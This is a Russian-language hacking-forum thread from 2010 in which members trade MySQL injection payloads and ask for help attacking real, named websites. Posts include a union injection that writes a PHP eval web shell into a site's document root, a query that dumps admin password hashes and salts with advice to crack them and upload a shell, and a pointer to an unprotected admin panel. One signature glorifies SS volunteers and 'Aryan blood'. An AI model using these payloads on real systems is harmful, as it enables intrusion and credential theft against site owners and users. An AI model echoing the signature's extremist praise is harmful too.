Ваши вопросы по уязвимостям.

14.05.2010, 20:30

DrakonHaSh

Познающий

Регистрация: 16.04.2008

Сообщений: 88

С нами: 9509918

Репутация: 30

Цитата:

Сообщение от [Feldmarschall]

DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html

пользоваться и применять я это умею

вникни, пожалуйста, в то, что я спрашиваю:

1. по mysql:
1a.

Код:

+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.

Код:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

Код:

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

𝕏 Twitter Reddit Telegram Копировать ссылку

15.05.2010, 11:44

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

С нами: 9030566

Репутация: 2017

Цитата:

Сообщение от DrakonHaSh

пользоваться и применять я это умею

вникни, пожалуйста, в то, что я спрашиваю:

1. по mysql:
1a.

Код:

+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.

Код:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

Код:

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

1 http://dev.mysql.com/doc/refman/5.1/en/row-subqueries.html
2 http://dev.mysql.com/doc/refman/5.0/en/select.html (все что после (A select_expr can be given an alias)
3 нет

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

15.05.2010, 13:23

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

нашел инъекцию...пока сам сайт показывать не буду, может быть и так будет понятно, что я хочу=)

подобрал колво столбцов
site.com/forum.php?id=65+union+select+1,2,3,4,5--
пока все нормально, НО, как только я делаю так:
site.com/forum.php?id=-65+union+select+1,2,3,4,5--

или пытаюсь узнать версию

site.com/forum.php?id=-65+union+select+version(),2,3,4,5--

то старница обнрвляется и на пару секунд выводится информация, которая мне нужна, то есть принтабельный столбец и версия, а потом через несколько секунд страница сама делает редирект на site.com/login.php

но этих пары секунд не достаточно, чтобы например разглядеть все названия столбцов и т.д.

как сделать так, чтобы страница сама не обновлялась?

14.05.2010, 17:20

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

Последний раз редактировалось jecka3000; 14.05.2010 в 17:26..

14.05.2010, 17:36

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

С нами: 10889431

Репутация: 34

Цитата:

Сообщение от jecka3000

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

1) Никак
2) Найти ошибку с раскрытием пути.

http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1--

Вот скуля раскручивай может чего нарулишь там.

Угар)) там даже раскручивать не надо ))
http://prod1.cmj.com/admin/
Вход в админку без авторизации))

Последний раз редактировалось kfor; 14.05.2010 в 17:42..

14.05.2010, 20:58

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

ребят кто нибудь из вас имел дело с админским панелем Advanced Poll 2.08 ?
и можно ли залить шелл через этот панель?

14.05.2010, 21:37

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

не могу записать минишел, нужна ваша помощь:
http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,'<?php eval($_GET[‘e’]) ?>',7,8,9,10,11,12,13,14+INTO+OUTFILE+'/home/bzpower/public_html/story.php'--

14.05.2010, 21:43

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

Цитата:

Сообщение от jecka3000

http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +from+mysql.user--+

//лей через форум

Цитата:

Сообщение от jecka3000

всмысле заюзать эксплоит под IP.Board?

или если я не понял, продемонстрируй плыз=)

http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,concat_ws(0x3a,conve rge_id,converge_pass_hash,converge_pass_salt),8,9, 10,11,12,13,14+from+ibf_members_converge--+

расшифровываешь хеш админа, заливаешь шелл через админку форума

Последний раз редактировалось .:[melkiy]:.; 14.05.2010 в 21:56..